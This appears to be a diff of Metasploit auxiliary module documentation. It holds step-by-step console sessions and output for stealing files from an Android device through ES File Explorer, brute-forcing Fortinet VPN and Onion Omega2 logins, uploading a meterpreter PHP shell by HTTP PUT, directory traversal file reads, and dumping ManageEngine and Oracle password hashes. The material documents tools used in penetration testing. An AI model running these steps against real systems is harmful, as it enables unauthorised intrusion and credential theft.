+  file: init.recovery.sun8i.rc (97.00 Bytes) - 12/31/1969 07:00:00 PM
+  file: init.rc (23.12 KB) - 12/31/1969 07:00:00 PM
+  file: init.environ.rc (919.00 Bytes) - 12/31/1969 07:00:00 PM
+  file: init (183.40 KB) - 12/31/1969 07:00:00 PM
+  file: fstab.sun8i (1.64 KB) - 12/31/1969 07:00:00 PM
+  file: file_contexts (9.03 KB) - 12/31/1969 07:00:00 PM
+  file: default.prop (116.00 Bytes) - 12/31/1969 07:00:00 PM
+  folder: data (4.00 KB) - 3/23/2019 10:36:52 AM
+  file: charger (274.11 KB) - 12/31/1969 07:00:00 PM
+  folder: root (0.00 Bytes) - 1/31/2015 05:24:35 AM
+  folder: dev (2.62 KB) - 3/23/2019 10:37:14 AM
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTVIDEOS
+action => LISTVIDEOS
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  DragonTouch-text.mp4 (55.30 MB) - 1/20/1970 10:18:53 PM: /storage/emulated/0/Movies/DragonTouch-text.mp4
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTAUDIOS
+action => LISTAUDIOS
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  Calendar Notification.ogg (52.89 KB) - 8/6/2015 08:15:30 PM: /storage/emulated/0/Notifications/Calendar Notification.ogg
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTAPPSSYSTEM
+action => LISTAPPSSYSTEM
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
+  Launcher (com.android.launcher) Version: 4.4.2-20150203
+  Contacts (com.android.contacts) Version: 4.4.2-20150203
+  com.android.providers.partnerbookmarks (com.android.providers.partnerbookmarks) Version: 4.4.2-20150203
+```
+...snip...
+
+```
+  Chrome (com.android.chrome) Version: 67.0.3396.87
+  Shell (com.android.shell) Version: 4.4.2-20150203
+  Google Contacts Sync (com.google.android.syncadapters.contacts) Version: 4.4.2-940549
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTAPPSPHONE
+action => LISTAPPSPHONE
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
+  Launcher (com.android.launcher) Version: 4.4.2-20150203
+  Contacts (com.android.contacts) Version: 4.4.2-20150203
+  com.android.providers.partnerbookmarks (com.android.providers.partnerbookmarks) Version: 4.4.2-20150203
+  Mobile Data (com.android.phone) Version: 4.4.2-20150203
+  Calculator (com.android.calculator2) Version: 4.4.2-20150203
+```
+...snip...
+
+```
+  Calendar (com.google.android.calendar) Version: 5.8.28-195646716-release
+  Face Unlock (com.android.facelock) Version: 4.4.2-940549
+  Chrome (com.android.chrome) Version: 67.0.3396.87
+  Shell (com.android.shell) Version: 4.4.2-20150203
+  Google Contacts Sync (com.google.android.syncadapters.contacts) Version: 4.4.2-940549
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTAPPSSDCARD
+action => LISTAPPSSDCARD
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTAPPSALL
+action => LISTAPPSALL
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
+  Launcher (com.android.launcher) Version: 4.4.2-20150203
+  Contacts (com.android.contacts) Version: 4.4.2-20150203
+```
+...snip...
+
+```
+  com.android.keyguard (com.android.keyguard) Version: 4.4.2-20150203
+  Calendar (com.google.android.calendar) Version: 5.8.28-195646716-release
+  Face Unlock (com.android.facelock) Version: 4.4.2-940549
+  Chrome (com.android.chrome) Version: 67.0.3396.87
+  Shell (com.android.shell) Version: 4.4.2-20150203
+  Google Contacts Sync (com.google.android.syncadapters.contacts) Version: 4.4.2-940549
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTPICS
+action => LISTPICS
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  IMG_20190323_165608.jpg (140.06 KB) - 3/23/2019 04:56:08 PM: /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action GETFILE
+action => GETFILE
+resource (es.rb)> set actionitem /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg
+actionitem => /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg
+resource (es.rb)> run
+[+] 1.1.1.1:59777  - /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg saved to /root/.msf4/loot/20190324073855_default_1.1.1.1_getFile_670725.jpg
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action LISTAPPS
+action => LISTAPPS
+resource (es.rb)> run
+[+] 1.1.1.1:59777  
+  TalkBack (com.google.android.marvin.talkback) Version: 5.0.7
+  Google Play services (com.google.android.gms) Version: 12.6.85 (000302-197041431)
+  Phone (com.andriod.phone) Version: 1.0
+  Google Play Music (com.google.android.music) Version: 8.12.7210-1.F
+  Google Text-to-speech Engine (com.google.android.tts) Version: 3.15.18.200023596
+  Cloud Print (com.google.android.apps.cloudprint) Version: 1.40
+  com.softwinner.videotest (com.softwinner.videotest) Version: 1.0
+  APUS (com.apusapps.launcher) Version: 2.3.1
+  Settings (com.android.system.io.settings) Version: 11.1.0
+  DragonPhone (com.softwinner.dragonphone) Version: 1.0
+  com.mediatek.touch (com.mediatek.touch) Version: 21_zh80001
+  Google Play Store (com.android.vending) Version: 13.9.17-all [0] [PR] 236777123
+  com.android.google.settings (com.android.google.settings) Version: 17_zh10317
+  MainActivity (com.metasploit.stage) Version: 1.0
+  Gmail (com.google.android.gm) Version: 8.6.3.200445973.release
+  L-Uninstall (com.clear.uninstall) Version: 2.0
+  ES File Explorer (com.estrongs.android.pop) Version: 4.1.9.5.1
+  DragonFire-v2.3 (com.softwinner.dragonfire) Version: 2.3 release
+  YouTube (com.google.android.youtube) Version: 13.23.59
+  Calendar (com.google.android.calendar) Version: 5.8.28-195646716-release
+  Chrome (com.android.chrome) Version: 67.0.3396.87
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> set action APPLAUNCH
+action => APPLAUNCH
+resource (es.rb)> set actionitem com.android.chrome
+actionitem => com.android.chrome
+resource (es.rb)> run
+[+] 1.1.1.1:59777  - com.android.chrome launched successfully
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (es.rb)> loot
+
+Loot
+====
+
+host           service  type                 name                                                     content                   info  path
+----           -------  ----                 ----                                                     -------                   ----  ----
+1.1.1.1        getDeviceInfo.json   es_file_explorer_getdeviceinfo.json                      application/json                /root/.msf4/loot/20190324073803_default_1.1.1.1_getDeviceInfo.js_744272.bin
+1.1.1.1        listFiles.json       es_file_explorer_listfiles.json                          application/json                /root/.msf4/loot/20190324073803_default_1.1.1.1_listFiles.json_522563.bin
+1.1.1.1        listVideos.json      es_file_explorer_listvideos.json                         application/json                /root/.msf4/loot/20190324073803_default_1.1.1.1_listVideos.json_623335.bin
+1.1.1.1        listAudio.json       es_file_explorer_listaudio.json                          application/json                /root/.msf4/loot/20190324073803_default_1.1.1.1_listAudio.json_331531.bin
+1.1.1.1        listAppsSystem.json  es_file_explorer_listappssystem.json                     application/json                /root/.msf4/loot/20190324073821_default_1.1.1.1_listAppsSystem.j_581712.bin
+1.1.1.1        listAppsPhone.json   es_file_explorer_listappsphone.json                      application/json                /root/.msf4/loot/20190324073838_default_1.1.1.1_listAppsPhone.js_773512.bin
+1.1.1.1        listAppsSdcard.json  es_file_explorer_listappssdcard.json                     application/json                /root/.msf4/loot/20190324073838_default_1.1.1.1_listAppsSdcard.j_543396.bin
+1.1.1.1        listAppsAll.json     es_file_explorer_listappsall.json                        application/json                /root/.msf4/loot/20190324073854_default_1.1.1.1_listAppsAll.json_886297.bin
+1.1.1.1        listPics.json        es_file_explorer_listpics.json                           application/json                /root/.msf4/loot/20190324073855_default_1.1.1.1_listPics.json_831055.bin
+1.1.1.1        getFile              /storage/emulated/0/DCIM/Camera/IMG_20190323_165608.jpg  application/octet-stream        /root/.msf4/loot/20190324073855_default_1.1.1.1_getFile_670725.jpg
+1.1.1.1        listApps.json        es_file_explorer_listapps.json                           application/json                /root/.msf4/loot/20190324073856_default_1.1.1.1_listApps.json_189709.bin
+```
@@ -0,0 +1,40 @@
+This module tests credentials on Fortinet SSL VPN servers (FortiGate).
+
+NOTE: This module is only executing when Fortinet SSL VPN Server is detected.
+When the server cannot be verified the module stops working.
+The realm/domain is used for every request when set.
+
+The module supports IPv6 requests.
+The module supports several hosts at the same time.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/fortinet_ssl_vpn```
+2. Do: ```set RHOSTS [IP]```
+3. Configure a user and password list by setting either `USERNAME`, `PASSWORD`, `USER_FILE`, or `PASS_FILE`.
+4. Do: ```run```
+
+## Scenarios
+
+IP-Addresses have been masked with x
+
+```
+msf5 auxiliary(scanner/http/fortinet_ssl_vpn) > run
+
+[+] xxxx:xxxx:xxxx:xxxx::4:443 - Server is responsive...
+[+] xxxx:xxxx:xxxx:xxxx::4:443 - Application appears to be Fortinet SSL VPN. Module will continue.
+[*] xxxx:xxxx:xxxx:xxxx::4:443 - Starting login brute force...
+[*] xxxx:xxxx:xxxx:xxxx::4:443 - [1/1] - Trying username:"testuser" with password:"superpass"
+[+] SUCCESSFUL LOGIN - "testuser":"superpass"
+[!] No active DB -- Credential data will not be saved!
+[*] Scanned 1 of 2 hosts (50% complete)
+[+] xxx.xxx.xxx.xxx:443 - [1/1] - Server is responsive...
+[+] xxx.xxx.xxx.xxx:443 - [1/1] - Application appears to be Fortinet SSL VPN. Module will continue.
+[*] xxx.xxx.xxx.xxx:443 - [1/1] - Starting login brute force...
+[*] xxx.xxx.xxx.xxx:443 - [1/1] - Trying username:"testuser" with password:"superpass"
+[+] SUCCESSFUL LOGIN - "testuser":"superpass"
+[!] No active DB -- Credential data will not be saved!
+[*] Scanned 2 of 2 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+```
@@ -0,0 +1,60 @@
+## Description 
+This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/http_put```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```set PATH [PATH]```
+5. Do: ```set FILENAME [FILNAME]```
+6. Do: ```set FILEDATA [PATH]```
+7. Do: ```run```
+
+## Options 
+
+### ACTION
+
+Set `ACTION` to either `PUT` or `DELETE`. (Default: `PUT`)
+
+**PUT**
+
+Action is set to PUT to upload files to the server. If `FILENAME` isn't specified, the module will generate a random string as a .txt file.
+
+**DELETE** 
+
+Deletes the file specified in the `FILENAME` option (Default: `msf_http_put_test.txt`). `FILENAME` is required when Action is set to DELETE. 
+
+### PATH
+
+The path at which this module will attempt to either PUT the content or DELETE it.
+
+### FILEDATA
+
+The content to put in the uploaded file when `ACTION` is set to `PUT`.
+
+
+## Scenarios
+
+Here `ACTION` is by default set to `PUT`.
+
+```
+msf > use auxiliary/scanner/http/http_put
+msf auxiliary(scanner/http/http_put) > set RHOSTS 1.1.1.23
+RHOSTS => 1.1.1.23
+msf auxiliary(scanner/http/http_put) > set RPORT 8585
+RPORT => 8585
+msf auxiliary(scanner/http/http_put) > set PATH /uploads
+PATH => /uploads
+msf auxiliary(scanner/http/http_put) > set FILENAME meterpreter.php
+FILENAME => meterpreter.php
+msf auxiliary(scanner/http/http_put) > set FILEDATA file://root/Desktop/meterpreter.php
+FILEDATA => file://root/Desktop/meterpreter.php
+msf auxiliary(scanner/http/http_put) > run 
+
+[+] File uploaded: http://1.1.1.23:8585/uploads/meterpreter.php
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/http_put) >
+```
+ 
@@ -0,0 +1,20 @@
+## Description
+
+  This module scans a JBoss instance for a few vulnerabilities.
+
+## Vulnerable Software
+
+  The JBoss Enterprise Application Platform (or JBoss EAP) is a
+  subscription-based/open-source Java EE-based application
+  server runtime platform used for building, deploying, and
+  hosting highly-transactional Java applications and services
+
+  This module has been successfully tested on:
+
+  * Apache-Coyote/1.1 ( Powered by Servlet 2.4; JBoss-4.2.0.GA (build: SVNTag=JBoss_4_2_0_GA date=200705111440)/Tomcat-5.5 )
+
+## Verification Steps
+
+  1. Do: ```use auxiliary/scanner/http/jboss_vulnscan```
+  2. Do: ```set RHOSTS [IP]```
+  3. Do: ```run```
@@ -0,0 +1,62 @@
+## Decription
+
+  This module extracts usernames and salted MD5 password hashes
+  from ManageEngine DeviceExpert version 5.9 build 5980 and prior.
+
+
+## Vulnerable Software
+
+  [DeviceExpert](http://www.manageengine.com/products/device-expert) is a
+  web–based, multi-vendor network configuration and change management (NCCM)
+  solution for switches, routers, firewalls and other network devices.
+
+  This module has been tested successfully on DeviceExpert
+  version 5.9.7 build 5970 on Windows XP SP3.
+
+  Software download:
+
+  * [5.8 build 5850](http://web.archive.org/web/20130123070454/http://www.manageengine.com/products/device-expert/download.html)
+  * [5.9 build 5900](http://web.archive.org/web/20130304043822/http://www.manageengine.com/products/device-expert/download.html)
+  * [5.9 build 5950](http://web.archive.org/web/20131029082827/http://www.manageengine.com/products/device-expert/download.html)
+
+
+## Verification Steps
+
+  1. Do: ```use auxiliary/scanner/http/manageengine_deviceexpert_user_creds```
+  2. Do: ```set RHOSTS [IP]```
+  3. Do: ```run```
+  4. You should receive usernames and associated password hashes + salts
+
+
+## Scenarios
+
+  ```
+  msf5 > use auxiliary/scanner/http/manageengine_deviceexpert_user_creds 
+  msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > set rhosts 172.16.158.131
+  rhosts => 172.16.158.131
+  msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > check
+  [+] 172.16.158.131:6060 - The target is vulnerable.
+  [*] Checked 1 of 1 hosts (100% complete)
+  msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > run
+
+  [*] 172.16.158.131:6060 - Found weak credentials (admin:admin)
+
+  ManageEngine DeviceExpert User Credentials
+  ==========================================
+
+   Username  Password  Password Hash                     Role           E-mail                Password Salt
+   --------  --------  -------------                     ----           ------                -------------
+   admin     admin     3a4ebf16a4795ad258e5408bae7be341  Administrator  noreply@zohocorp.com  12345678
+
+  [*] Credentials saved in: /Users/jvazquez/.msf4/loot/20140926165907_default_172.16.158.131_manageengine.dev_118155.txt
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > creds 172.16.158.131
+  Credentials
+  ===========
+
+  host            service           public  private  realm  private_type
+  ----            -------           ------  -------  -----  ------------
+  172.16.158.131  6060/tcp (https)  admin   admin           Password
+  ```
+
@@ -0,0 +1,72 @@
+## Description
+The onion_omega2_login module is used to brute-force credentials for Onion Omage2 devices.
+
+## Vulnerable Application
+* Onion Omage2 HTTPd Service
+
+![Onion Omega2](https://raw.githubusercontent.com/OnionIoT/Onion-Docs/master/Omega2/Documentation/Get-Started/img/unbox-6-omega-led-detail.jpg)
+
+![Onion Omega2 OnionOS Web Page](https://i.imgur.com/nrHnQaW.png)
+
+## Verification Steps
+1. Plug your Onion Omega2 device to a power source. 
+    - First time setup can be found [here](https://docs.onion.io/omega2-docs/first-time-setup.html)
+2. Connect to its Wi-Fi network.
+3. Start `msfconsole`
+4. Do: `use auxiliary/scanner/http/onion_omega2_login`
+5. Do: `set RHOSTS 192.168.3.1`
+6. Do: `set USERPASS_FILE <user pass dictionary>`
+    - username and password seperated by space and one pair per line.
+7. Do: `run`
+
+Sample userpass file:
+```text
+root 123456
+root password
+root 123456789
+root 12345678
+root 12345
+root 10601
+root qwerty
+root 123123
+root 111111
+root abc123
+root 1234567
+root dragon
+root 1q2w3e4r
+root sunshine
+root 654321
+root master
+```
+
+## Scenario 
+```
+msf5 > use auxiliary/scanner/http/onion_omega2_login
+msf5 auxiliary(scanner/http/onion_omega2_login) > set RHOSTS 192.168.3.1
+RHOSTS => 192.168.3.1
+msf5 auxiliary(scanner/http/onion_omega2_login) > set USERPASS_FILE something.txt
+USERPASS_FILE => something.txt
+msf5 auxiliary(scanner/http/onion_omega2_login) > run
+
+[*] Running for 192.168.3.1...
+[*] 192.168.3.1:80 - [ 1/16] - root:123456 - Failure
+[!] No active DB -- Credential data will not be saved!
+[*] 192.168.3.1:80 - [ 2/16] - root:password - Failure
+[*] 192.168.3.1:80 - [ 3/16] - root:123456789 - Failure
+[*] 192.168.3.1:80 - [ 4/16] - root:12345678 - Failure
+[*] 192.168.3.1:80 - [ 5/16] - root:12345 - Failure
+[+] Ubus RPC Session: 403e133730879d23a2a0df022e19c19c
+[+] 192.168.3.1:80 - [ 6/16] - root:10601 - Success
+[*] 192.168.3.1:80 - [ 7/16] - root:qwerty - Failure
+[*] 192.168.3.1:80 - [ 8/16] - root:123123 - Failure
+[*] 192.168.3.1:80 - [ 9/16] - root:111111 - Failure
+[*] 192.168.3.1:80 - [10/16] - root:abc123 - Failure
+[*] 192.168.3.1:80 - [11/16] - root:1234567 - Failure
+[*] 192.168.3.1:80 - [12/16] - root:dragon - Failure
+[*] 192.168.3.1:80 - [13/16] - root:1q2w3e4r - Failure
+[*] 192.168.3.1:80 - [14/16] - root:sunshine - Failure
+[*] 192.168.3.1:80 - [15/16] - root:654321 - Failure
+[*] 192.168.3.1:80 - [16/16] - root:master - Failure
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,31 @@
+## Description
+
+This module scans a given range of IP address and queries web servers for the options that are available on them.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/options```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [number of threads]```
+4. Do: ```run```
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/http/options
+msf auxiliary(scanner/http/options) > set RHOSTS 192.168.1.200-210
+RHOSTS => 192.168.1.200-210
+msf auxiliary(scanner/http/options) > set THREADS 11
+THREADS => 11
+msf auxiliary(scanner/http/options) > run
+
+[*] 192.168.1.203 allows OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK methods
+[*] 192.168.1.204 allows OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK methods
+[*] 192.168.1.205 allows OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK methods
+[*] 192.168.1.206 allows OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK methods
+[*] 192.168.1.208 allows GET,HEAD,POST,OPTIONS,TRACE methods
+[*] 192.168.1.209 allows GET,HEAD,POST,OPTIONS,TRACE methods
+[*] Scanned 11 of 11 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/options) >
+```
@@ -0,0 +1,48 @@
+## Description
+
+  This module exploits a directory traversal vulnerability in the RIPS Scanner v0.54,
+  allowing to read arbitrary files with the web server privileges.
+
+
+## Vulnerable Application
+
+  [RIPS](http://rips-scanner.sourceforge.net/) is a static source code analyser
+  for vulnerabilities in PHP scripts.
+
+  * [RIPS v0.54 Source](https://sourceforge.net/projects/rips-scanner/files/rips-0.54.zip/download)
+
+
+## Verification
+
+  1. Start `msfconsole`
+  2. `use auxiliary/scanner/http/rips_traversal`
+  3. `set RHOSTS <rhost>`
+  4. `set FILEPATH </path/to/file>`
+  5. `run`
+
+
+## Scenarios
+
+  ```
+  msf5 > use auxiliary/scanner/http/rips_traversal
+  msf5 auxiliary(scanner/http/rips_traversal) > set rhosts 172.16.191.188
+  rhosts => 172.16.191.188
+  msf5 auxiliary(scanner/http/rips_traversal) > set filepath /etc/hosts
+  filepath => /etc/hosts
+  msf5 auxiliary(scanner/http/rips_traversal) > run
+  
+   127.0.0.1        localhost
+    
+    # The following lines are desirable for IPv6 capable hosts
+    ::1     localhost ip6-localhost ip6-loopback
+    ff02::1 ip6-allnodes
+    ff02::2 ip6-allrouters
+    
+    127.0.0.1 wpad
+    
+   
+  [+] File saved in: /root/.msf4/loot/20190208082709_default_172.16.191.188_rips.traversal_654208.txt
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```
+
@@ -0,0 +1,35 @@
+## Description 
+This module scrapes data from a specific web page based on a regular expression.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/scraper```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```run```
+
+## Options
+
+### PATH 
+
+The path from where the data is to be scraped from.
+ 
+### PATTERN
+
+A regular expression to capture data from webpage. Default value:`<title>(.*)</title>` which simply grabs the page title.
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/http/scraper
+msf auxiliary(scanner/http/scraper) > set RHOSTS 1.1.1.18
+RHOSTS => 1.1.1.18
+msf auxiliary(scanner/http/scraper) > run 
+
+[+] 1.1.1.18 / [Index of /]
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/scraper) >
+```
+
+The title of `1.1.1.18/` page is `Index of /`.
+
@@ -0,0 +1,35 @@
+## Description
+
+This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
+Spring Cloud Config listens by default on port 8888.
+
+### Vulnerable Application
+
+* https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip
+
+## Verification
+
+1. `./msfconsole`
+2. `use auxiliary/scanner/http/springcloud_traversal`
+3. `set rhosts <rhost>`
+4. `run`
+
+## Scenarios
+
+### Tested against Linux zero 4.15.0-48-generic #51-Ubuntu SMP x86_64 GNU/Linux
+
+```
+msf > use auxiliary/scanner/http/springcloud_traversal 
+msf auxiliary(scanner/http/springcloud_traversal) > set RHOSTS 192.168.1.132
+RHOSTS => 192.168.1.132
+msf auxiliary(scanner/http/springcloud_traversal) > run
+
+[+] File saved in: /home/input0/.msf4/loot/20190418203756_default_192.168.1.132_springcloud.trav_893434.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/springcloud_traversal) >
+```
+
+## References
+
+* https://pivotal.io/security/cve-2019-3799
@@ -0,0 +1,60 @@
+## Description
+
+This module check and exploits a Directory Traversal vulnerability in Total.js framework < 3.2.4 (CVE-2019-8903). Here is a list of accepted extensions: flac, jpg, jpeg, png, gif, ico, js, css, txt, xml, woff, woff2, otf, ttf, eot, svg, zip, rar, pdf, docx, xlsx, doc, xls, html, htm, appcache, manifest, map, ogv, ogg, mp4, mp3, webp, webm, swf, package, json, md, m4v, jsx, heif, heic.
+
+## Vulnerable Application
+
+Affecting total.js package, versions:
+
+* >=2.1.0 <2.1.1
+* >=2.2.0 <2.2.1
+* >=2.3.0 <2.3.1
+* >=2.4.0 <2.4.1
+* >=2.5.0 <2.5.1
+* >=2.6.0 <2.6.3
+* >=2.7.0 <2.7.1
+* >=2.8.0 <2.8.1
+* >=2.9.0 <2.9.5
+* >=3.0.0 <3.0.1
+* >=3.1.0 <3.1.1
+* >=3.2.0 <3.2.4
+
+## Verification Steps
+
+1. On a Node v8 environment do: `npm install total.js@3.2.3`
+2. Install an app on top of the Total.js framework, something like [Total.js CMS](https://github.com/totaljs/cms)
+  * `git clone https://github.com/totaljs/cms.git`
+  * `cd cms && npm install`
+3. Start `msfconsole`
+4. `use auxiliary/scanner/http/totaljs_traversal`
+5. `set RHOST <IP>`
+6. `set RPORT <PORT>`
+7. `run`
+8. Verify you get Total.js version if the target is vulnerable!
+
+## Options
+
+* **TARGETURI**: Path to Total.js App installation (“/” is the default)
+* **DEPTH**: Traversal depth (“1” is the default)
+* **FILE**: File to obtain (“databases/settings.json” is the default for Total.js CMS App)
+
+## Scenario
+
+### Tested on Total.js framework 3.2.0 and Total.js CMS 12.0.0
+
+```
+msf5 > use auxiliary/scanner/http/totaljs_traversal 
+msf5 auxiliary(scanner/http/totaljs_traversal) > set RHOST 192.168.2.59
+RHOST => 192.168.2.59
+msf5 auxiliary(scanner/http/totaljs_traversal) > set RPORT 8320
+RPORT => 8320
+msf5 auxiliary(scanner/http/totaljs_traversal) > run
+[*] Running module against 192.168.2.59
+
+[*] Total.js version is: ^3.2.0
+[*] App name: CMS
+[*] App description: A simple and powerful CMS solution written in Total.js / Node.js.
+[*] App version: 12.0.0
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/totaljs_traversal) >
+```
@@ -0,0 +1,173 @@
+## Preparation: 6 steps
+
+  1. Oracle DB XE (Express Edition) can be downloaded for free [here](https://www.oracle.com/technetwork/database/database-technologies/express-edition/downloads/index.html).
+  2. Install Oracle Database and create a database. Versions 8i through 12c are supported.
+  3. On your Oracle DB machine, make sure you can ping the DB server using the `tnsping [SID]` command. If `tnsping` is not in your path upon installation, you will have to locate it manually.
+     * On a Windows machine, for Oracle 11g, `tnsping.exe` is located at: `oracle_install\app\oracle\product\<version, ie 11.2.0)\server\bin\tnsping.exe`.
+     * On a Windows machine, for Oracle 12c and 18c, it is located at `%ORACLE_HOME%\bin\tnsping.exe`.
+
+     After this command is run, if all is well, the output will look something like this (note the OK echoed at the end):
+
+    ```
+    C:> tnsping staticdb
+    ...
+    
+    Used TNSNAMES adapter to resolve the alias
+    Attempting to contact (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = localhost)(PORT = 1521)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = staticdb)))
+    OK (0 msec)
+    ```
+
+    If `tnsping` fails, make sure the listener is setup correctly.
+    See [this Oracle doc](https://docs.oracle.com/cd/E11882_01/network.112/e41945/listenercfg.htm#NETAG294) for more information about its configuration. 
+
+  4. Make sure to create a user on the DB that has a known password, and sufficient privileges to select any table. This is necessary for getting the hashes.
+  5. Test that the module's hash query works locally. Once your user is created with sufficient privileges, connect to the DB as the user, and proceed to run the following query
+    * 12c: `SELECT name, spare4 FROM sys.user$ where password is not null and name <> \'ANONYMOUS\'`
+    * pre-12c: `SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\'`
+  6. Set up your MSF environment to support Oracle. You need gem ruby-oci8, as well as Oracle Instant Client.
+     [View the setup tutorial here](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux)
+  7. Make sure you have a database connected to MSF (postgresql). This can be done through `msfdb` tool or through `db_connect` command in `msfconsole`.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: ```use auxiliary/scanner/oracle/oracle_hashdump.rb```
+  3. Do: ```run```
+  4. If Oracle DB version is supported, the query will be attempted to get the hashes. Hash table is built and then saved as credentials.
+  5. You may view saved credentials with `creds` command. These are used for cracking by module `jtr_oracle_fast`.
+
+## Options
+
+  **DBPASS**
+  The password to authenticate with. Change this from TIGER to the password of the privileged user created in step 4 of Preparation.
+
+  **DBUSER**
+  The username to authenticate with. Change this from SCOTT to the user you created who is granted privileges to select from the sys.user$ table
+
+  **RPORT**
+  The TNS port of the Oracle DB server. By default, Oracle uses port 1521. Double-check the port of your Oracle DB.
+
+  **SID**
+  The Service ID (of the database) to authenticate with. Change this to your SID (if you changed the SID from default upon installation).
+  Default is `ORCL` (default Oracle install value) or `XE` for free edition.
+
+## Scenarios
+
+### Running Oracle 12c on a local Windows 10 machine, and MSF5 on Ubuntu for Windows (same machine)
+
+```
+msf5 auxiliary(scanner/oracle/oracle_hashdump) > show options
+Module options (auxiliary/scanner/oracle/oracle_hashdump):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   DBPASS   hunter2          yes       The password to authenticate with.
+   DBUSER   scott            yes       The username to authenticate with.
+   RHOST    127.0.0.1        yes       The Oracle host.
+   RHOSTS   127.0.0.1        yes       The target address range or CIDR identifier
+   RPORT    1522             yes       The TNS port.
+   SID      staticdb         yes       The sid to authenticate with.
+   THREADS  1                yes       The number of concurrent threads
+
+msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
+
+[*] Server is running 12c
+[*] Hash table :
+ Oracle Server Hashes
+====================
+
+ Username               Hash
+ --------               ----
+ ...
+ SCOTT                  S:BF6D4E3791075A348BA76EF533E38F7211513CCE2A3513EE3E3D4A5A4DE0;H:3814C74599475EB73043A1211742EE59;T:0911BAC55EEF63F0C1769E816355BE29492C9D01980DC36C95A86C9CE47F93790631DE3D9A60C90451CFF152E25D9E94F612A1493EC82AF8E3C4D0432B06BA4C2C693B932332BC14D2D66CEF098A4699
+ ...
+ 
+[+] Hash Table has been saved
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/oracle/oracle_hashdump) > creds
+Credentials
+===========
+
+host       origin     service            public  private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
+----       ------     -------            ------  -------      
+...                                                                                                                                                                                                                                                         -----  ------------        ----------
